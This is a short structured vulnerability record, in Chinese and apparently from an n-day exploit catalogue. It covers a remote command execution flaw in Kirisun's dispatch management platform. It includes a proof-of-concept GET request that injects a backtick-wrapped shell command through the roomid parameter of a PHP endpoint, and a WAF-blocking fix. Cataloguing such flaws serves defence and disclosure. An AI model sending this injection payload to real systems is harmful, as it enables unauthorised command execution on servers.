vendor = "科立讯通信"
name = "福建科立讯通信 指挥调度管理平台存在远程命令执行漏洞"
type = "RCE"
version = "未知"
path = "/api/client/audiobroadcast/invite_one_member.php"
detail = "GET /api/client/audiobroadcast/invite_one_member.php?callee=1&roomid=%60echo%20test%3Etest.txt%60 HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36 Accept-Encoding: gzip, deflate Accept: */* Connection: keep-alive"
fix = "WAF封禁路径，等待发布补丁"
date = "0722"
label = "nday"
